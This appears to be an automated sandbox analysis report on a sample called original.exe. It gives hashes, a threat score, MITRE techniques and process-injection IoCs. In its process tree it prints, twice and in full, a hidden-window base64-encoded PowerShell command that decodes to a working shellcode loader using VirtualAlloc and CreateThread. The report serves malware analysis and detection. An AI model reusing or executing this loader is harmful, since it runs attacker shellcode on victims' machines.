773365765b15ea9c6fff1a7c8cd943596c079c6d3fc8080e10407bdcbca1f70d

General

Target

original.exe
Size

345KB
MD5

bb912d0fbd20af67c817d821fe09fe9a
SHA1

7c3769282e4f97f8c48e454a64a78491687b85c4
SHA256

f2e63f4c56e6b61e4aec708daea4e8a5abbb435b1d9cdeb8e2b8d5c70422b2fa
SHA512

ab05d969b26969c380a7fee8432e3995769abf951c6bae9ef2ae7702401b353b8eafe927590239128ea1c1452948ae4024fed07e7ec2dab7bb289b488f0a717e

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

original.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	original.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2028 powershell.exe
2028 powershell.exe
2436 powershell.exe
2436 powershell.exe
2876 powershell.exe
2876 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2028 powershell.exe
Token: SeDebugPrivilege 2436 powershell.exe
Token: SeDebugPrivilege 2876 powershell.exe

pid	process
2028	powershell.exe
2028	powershell.exe
2436	powershell.exe
2436	powershell.exe
2876	powershell.exe
2876	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2436	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

original.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1872 wrote to memory of 2028	1872	original.exe	powershell.exe
PID 1872 wrote to memory of 2028	1872	original.exe	powershell.exe
PID 2028 wrote to memory of 2436	2028	powershell.exe	powershell.exe
PID 2028 wrote to memory of 2436	2028	powershell.exe	powershell.exe
PID 2436 wrote to memory of 2876	2436	powershell.exe	powershell.exe
PID 2436 wrote to memory of 2876	2436	powershell.exe	powershell.exe
PID 2436 wrote to memory of 2876	2436	powershell.exe	powershell.exe
PID 2876 wrote to memory of 676	2876	powershell.exe	csc.exe
PID 2876 wrote to memory of 676	2876	powershell.exe	csc.exe
PID 2876 wrote to memory of 676	2876	powershell.exe	csc.exe
PID 676 wrote to memory of 3200	676	csc.exe	cvtres.exe
PID 676 wrote to memory of 3200	676	csc.exe	cvtres.exe
PID 676 wrote to memory of 3200	676	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\original.exe
"C:\Users\Admin\AppData\Local\Temp\original.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABDADUAdQAgAD0AIAAnACQAUwBCAGEANQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABTAEIAYQA1ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeABiAGEALAAwAHgAYwBkACwAMAB4ADAANgAsADAAeABhAGIALAAwAHgAYgAyACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAMwA4ACwAMAB4AGYAYQAsADAAeAA0ADMALAAwAHgAMwAwACwAMAB4AGMAMgAsADAAeAAwADMALAAwAHgAOQA0ACwAMAB4ADUANQAsADAAeAA0AGIALAAwAHgAZQA2ACwAMAB4AGEANQAsADAAeAA1ADUALAAwAHgAMgBmACwAMAB4ADYAMgAsADAAeAA5ADUALAAwAHgANgA1ACwAMAB4ADIANAAsADAAeAAyADYALAAwAHgAMQBhACwAMAB4ADAAZAAsADAAeAA2ADgALAAwAHgAZAAzACwAMAB4AGEAOQAsADAAeAA2ADMALAAwAHgAYQA0ACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgAYwA5ACwAMAB4ADkAMgAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADYAMgAsADAAeABlADYALAAwAHgANwBhACwAMAB4ADEAOAAsADAAeAA3ADkALAAwAHgAMwBhACwAMAB4ADUAZAAsADAAeAAyADEALAAwAHgAYgAyACwAMAB4ADQAZgAsADAAeAA5AGMALAAwAHgANgA2ACwAMAB4AGEAZgAsADAAeABiAGQALAAwAHgAYwBjACwAMAB4ADMAZgAsADAAeABiAGIALAAwAHgAMQAzACwAMAB4AGUAMQAsADAAeAAzADQALAAwAHgAZgAxACwAMAB4AGEAZgAsADAAeAA4AGEALAAwAHgAMAA3ACwAMAB4ADEANwAsADAAeABiADcALAAwAHgANgBmACwAMAB4AGQAZgAsADAAeAAxADYALAAwAHgAOQA2ACwAMAB4ADIAMQAsADAAeAA2AGIALAAwAHgANAAxACwAMAB4ADMAOAAsADAAeABjADMALAAwAHgAYgA4ACwAMAB4AGYAOQAsADAAeAA3ADEALAAwAHgAZABiACwAMAB4AGQAZAAsADAAeABjADQALAAwAHgAYwA4ACwAMAB4ADUAMAAsADAAeAAxADUALAAwAHgAYgAyACwAMAB4AGMAYgAsADAAeABiADAALAAwAHgANgA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADQANwAsADAAeABjAGUALAAwAHgANwA2ACwAMAB4ADMAOQAsADAAeAA2AGYALAAwAHgAMwAxACwAMAB4ADAAZAAsADAAeAAzADMALAAwAHgAOQAzACwAMAB4AGMAYwAsADAAeAAxADUALAAwAHgAOAAwACwAMAB4AGUAOQAsADAAeAAwAGEALAAwAHgAOQAwACwAMAB4ADEAMwAsADAAeAA0ADkALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeABmADgALAAwAHgANgBiACwAMAB4ADAAZAAsADAAeABkADQALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeABmAGEALAAwAHgAOQAzACwAMAB4AGQANAAsADAAeAA2ADQALAAwAHgAZgBkACwAMAB4ADcAMAAsADAAeAA2AGYALAAwAHgAOQAwACwAMAB4ADcANgAsADAAeAA3ADcALAAwAHgAYQAwACwAMAB4ADEAMAAsADAAeABjAGMALAAwAHgANQAzACwAMAB4ADYANAAsADAAeAA3ADgALAAwAHgAOQA2ACwAMAB4AGYAYQAsADAAeAAzAGQALAAwAHgAMgA0ACwAMAB4ADcAOQAsADAAeAAwADMALAAwAHgANQBkACwAMAB4ADgANwAsADAAeAAyADYALAAwAHgAYQAxACwAMAB4ADEANQAsADAAeAAyAGEALAAwAHgAMwAyACwAMAB4AGQAOAAsADAAeAA3ADcALAAwAHgAMgAzACwAMAB4AGYANwAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgANgAzACwAMAB4AGYAYgAsADAAeAA4ADEALAAwAHgAMAAwACwAMAB4AGQAZgAsADAAeAA5ADMALAAwAHgAYQA5ACwAMAB4AGMAOQAsADAAeABmADkALAAwAHgANgA0ACwAMAB4AGIAYgAsADAAeABkAGUALAAwAHgAZgBhACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgAOABlACwAMAB4ADAANQAsADAAeAAzAGMALAAwAHgANwA0ACwAMAB4ADgANgAsADAAeABjADEALAAwAHgANgA4ACwAMAB4ADIANAAsADAAeABiADAALAAwAHgAZQAwACwAMAB4ADEAMAAsADAAeABhAGYALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeABjADUALAAwAHgANQBhACwAMAB4ADQAYgAsADAAeAA5ADkALAAwAHgAMgA2ACwAMAB4ADMAMgAsADAAeABkADIALAAwAHgAYwBiACwAMAB4AGMAZgAsADAAeAA0ADEALAAwAHgAZQA1ACwAMAB4AGMAYwAsADAAeAAwADAALAAwAHgAYwBmACwAMAB4ADAAMwAsADAAeAA0ADIALAAwAHgANABmACwAMAB4ADkAZgAsADAAeAA5AGIALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAA1AGYALAAwAHgANABjACwAMAB4AGMAYQAsADAAeAA1ADUALAAwAHgANQAwACwAMAB4AGIAMwAsADAAeABlAGEALAAwAHgANQA1ACwAMAB4AGIAYQAsADAAeABkAGMALAAwAHgAOAAwACwAMAB4AGIAOQAsADAAeAAxADMALAAwAHgAYgA0ACwAMAB4ADMAYwAsADAAeAAyADMALAAwAHgAMwBlACwAMAB4ADQAZQAsADAAeABkAGQALAAwAHgAYQBjACwAMAB4ADkANAAsADAAeAAyAGEALAAwAHgAZABkACwAMAB4ADIANwAsADAAeAAxAGIALAAwAHgAYwBhACwAMAB4ADkAMwAsADAAeABjAGYALAAwAHgANQA2ACwAMAB4AGQAOAAsADAAeAA0ADMALAAwAHgAMgAwACwAMAB4ADIAZAAsADAAeAA4ADIALAAwAHgAYwA1ACwAMAB4ADMAZgAsADAAeAA5AGIALAAwAHgAYQA5ACwAMAB4AGUAOQAsADAAeABkADUALAAwAHgAMgAwACwAMAB4ADcAOAAsADAAeABiAGUALAAwAHgANAAxACwAMAB4ADIAYgAsADAAeAA1AGQALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeABkADQALAAwAHgAOAA4ACwAMAB4ADgAMwAsADAAeABjADQALAAwAHgANAAwACwAMAB4ADcAMwAsADAAeABmAGIALAAwAHgAMgA4ACwAMAB4ADgANQAsADAAeAA3ADMALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABjAGYALAAwAHgANwAzACwAMAB4ADkAMwAsADAAeAAyADYALAAwAHgAYQBiACwAMAB4ADIANwAsADAAeAA4ADYALAAwAHgAMgA4ACwAMAB4ADYANgAsADAAeAA1ADQALAAwAHgAMQBiACwAMAB4AGIAZAAsADAAeAA4ADkALAAwAHgAMABkACwAMAB4AGMAOAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4AGIAMwAsADAAeAAzADcALAAwAHgANQAwACwAMAB4AGEAZAAsADAAeAA0AGMALAAwAHgAMQAyACwAMAB4ADYAMAAsADAAeAA5ADEALAAwAHgAOQBhACwAMAB4ADUAYQAsADAAeAAxADYALAAwAHgAZgBiACwAMAB4ADEAZQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbABiADUAOAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbABiADUAOAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbABiADUAOAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMANQB1ACkAKQA7ACQAOQBEAFgAbgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFkARgBCADkAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAWQBGAEIAOQAgACQAOQBEAFgAbgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA5AEQAWABuACAAJABlACIAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABDADUAdQAgAD0AIAAnACQAUwBCAGEANQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABTAEIAYQA1ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeABiAGEALAAwAHgAYwBkACwAMAB4ADAANgAsADAAeABhAGIALAAwAHgAYgAyACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEANgAsADAAeABlADIALAAwAHgAMwA4ACwAMAB4AGYAYQAsADAAeAA0ADMALAAwAHgAMwAwACwAMAB4AGMAMgAsADAAeAAwADMALAAwAHgAOQA0ACwAMAB4ADUANQAsADAAeAA0AGIALAAwAHgAZQA2ACwAMAB4AGEANQAsADAAeAA1ADUALAAwAHgAMgBmACwAMAB4ADYAMgAsADAAeAA5ADUALAAwAHgANgA1ACwAMAB4ADIANAAsADAAeAAyADYALAAwAHgAMQBhACwAMAB4ADAAZAAsADAAeAA2ADgALAAwAHgAZAAzACwAMAB4AGEAOQAsADAAeAA2ADMALAAwAHgAYQA0ACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgAYwA5ACwAMAB4ADkAMgAsADAAeABkAGIALAAwAHgAOQBiACwAMAB4ADYAMgAsADAAeABlADYALAAwAHgANwBhACwAMAB4ADEAOAAsADAAeAA3ADkALAAwAHgAMwBhACwAMAB4ADUAZAAsADAAeAAyADEALAAwAHgAYgAyACwAMAB4ADQAZgAsADAAeAA5AGMALAAwAHgANgA2ACwAMAB4AGEAZgAsADAAeABiAGQALAAwAHgAYwBjACwAMAB4ADMAZgAsADAAeABiAGIALAAwAHgAMQAzACwAMAB4AGUAMQAsADAAeAAzADQALAAwAHgAZgAxACwAMAB4AGEAZgAsADAAeAA4AGEALAAwAHgAMAA3ACwAMAB4ADEANwAsADAAeABiADcALAAwAHgANgBmACwAMAB4AGQAZgAsADAAeAAxADYALAAwAHgAOQA2ACwAMAB4ADIAMQAsADAAeAA2AGIALAAwAHgANAAxACwAMAB4ADMAOAAsADAAeABjADMALAAwAHgAYgA4ACwAMAB4AGYAOQAsADAAeAA3ADEALAAwAHgAZABiACwAMAB4AGQAZAAsADAAeABjADQALAAwAHgAYwA4ACwAMAB4ADUAMAAsADAAeAAxADUALAAwAHgAYgAyACwAMAB4AGMAYgAsADAAeABiADAALAAwAHgANgA3ACwAMAB4ADMAYgAsADAAeAA2ADcALAAwAHgAZgBkACwAMAB4ADQANwAsADAAeABjAGUALAAwAHgANwA2ACwAMAB4ADMAOQAsADAAeAA2AGYALAAwAHgAMwAxACwAMAB4ADAAZAAsADAAeAAzADMALAAwAHgAOQAzACwAMAB4AGMAYwAsADAAeAAxADUALAAwAHgAOAAwACwAMAB4AGUAOQAsADAAeAAwAGEALAAwAHgAOQAwACwAMAB4ADEAMwAsADAAeAA0ADkALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeABmADgALAAwAHgANgBiACwAMAB4ADAAZAAsADAAeABkADQALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeABmAGEALAAwAHgAOQAzACwAMAB4AGQANAAsADAAeAA2ADQALAAwAHgAZgBkACwAMAB4ADcAMAAsADAAeAA2AGYALAAwAHgAOQAwACwAMAB4ADcANgAsADAAeAA3ADcALAAwAHgAYQAwACwAMAB4ADEAMAAsADAAeABjAGMALAAwAHgANQAzACwAMAB4ADYANAAsADAAeAA3ADgALAAwAHgAOQA2ACwAMAB4AGYAYQAsADAAeAAzAGQALAAwAHgAMgA0ACwAMAB4ADcAOQAsADAAeAAwADMALAAwAHgANQBkACwAMAB4ADgANwAsADAAeAAyADYALAAwAHgAYQAxACwAMAB4ADEANQAsADAAeAAyAGEALAAwAHgAMwAyACwAMAB4AGQAOAAsADAAeAA3ADcALAAwAHgAMgAzACwAMAB4AGYANwAsADAAeABkADAALAAwAHgAOAA3ACwAMAB4AGIAMwAsADAAeAA5AGYALAAwAHgANgAzACwAMAB4AGYAYgAsADAAeAA4ADEALAAwAHgAMAAwACwAMAB4AGQAZgAsADAAeAA5ADMALAAwAHgAYQA5ACwAMAB4AGMAOQAsADAAeABmADkALAAwAHgANgA0ACwAMAB4AGIAYgAsADAAeABkAGUALAAwAHgAZgBhACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgAOABlACwAMAB4ADAANQAsADAAeAAzAGMALAAwAHgANwA0ACwAMAB4ADgANgAsADAAeABjADEALAAwAHgANgA4ACwAMAB4ADIANAAsADAAeABiADAALAAwAHgAZQAwACwAMAB4ADEAMAAsADAAeABhAGYALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeABjADUALAAwAHgANQBhACwAMAB4ADQAYgAsADAAeAA5ADkALAAwAHgAMgA2ACwAMAB4ADMAMgAsADAAeABkADIALAAwAHgAYwBiACwAMAB4AGMAZgAsADAAeAA0ADEALAAwAHgAZQA1ACwAMAB4AGMAYwAsADAAeAAwADAALAAwAHgAYwBmACwAMAB4ADAAMwAsADAAeAA0ADIALAAwAHgANABmACwAMAB4ADkAZgAsADAAeAA5AGIALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAA1AGYALAAwAHgANABjACwAMAB4AGMAYQAsADAAeAA1ADUALAAwAHgANQAwACwAMAB4AGIAMwAsADAAeABlAGEALAAwAHgANQA1ACwAMAB4AGIAYQAsADAAeABkAGMALAAwAHgAOAAwACwAMAB4AGIAOQAsADAAeAAxADMALAAwAHgAYgA0ACwAMAB4ADMAYwAsADAAeAAyADMALAAwAHgAMwBlACwAMAB4ADQAZQAsADAAeABkAGQALAAwAHgAYQBjACwAMAB4ADkANAAsADAAeAAyAGEALAAwAHgAZABkACwAMAB4ADIANwAsADAAeAAxAGIALAAwAHgAYwBhACwAMAB4ADkAMwAsADAAeABjAGYALAAwAHgANQA2ACwAMAB4AGQAOAAsADAAeAA0ADMALAAwAHgAMgAwACwAMAB4ADIAZAAsADAAeAA4ADIALAAwAHgAYwA1ACwAMAB4ADMAZgAsADAAeAA5AGIALAAwAHgAYQA5ACwAMAB4AGUAOQAsADAAeABkADUALAAwAHgAMgAwACwAMAB4ADcAOAAsADAAeABiAGUALAAwAHgANAAxACwAMAB4ADIAYgAsADAAeAA1AGQALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeABkADQALAAwAHgAOAA4ACwAMAB4ADgAMwAsADAAeABjADQALAAwAHgANAAwACwAMAB4ADcAMwAsADAAeABmAGIALAAwAHgAMgA4ACwAMAB4ADgANQAsADAAeAA3ADMALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABjAGYALAAwAHgANwAzACwAMAB4ADkAMwAsADAAeAAyADYALAAwAHgAYQBiACwAMAB4ADIANwAsADAAeAA4ADYALAAwAHgAMgA4ACwAMAB4ADYANgAsADAAeAA1ADQALAAwAHgAMQBiACwAMAB4AGIAZAAsADAAeAA4ADkALAAwAHgAMABkACwAMAB4AGMAOAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4AGIAMwAsADAAeAAzADcALAAwAHgANQAwACwAMAB4AGEAZAAsADAAeAA0AGMALAAwAHgAMQAyACwAMAB4ADYAMAAsADAAeAA5ADEALAAwAHgAOQBhACwAMAB4ADUAYQAsADAAeAAxADYALAAwAHgAZgBiACwAMAB4ADEAZQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbABiADUAOAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbABiADUAOAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbABiADUAOAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMANQB1ACkAKQA7ACQAOQBEAFgAbgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFkARgBCADkAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAWQBGAEIAOQAgACQAOQBEAFgAbgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA5AEQAWABuACAAJABlACIAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
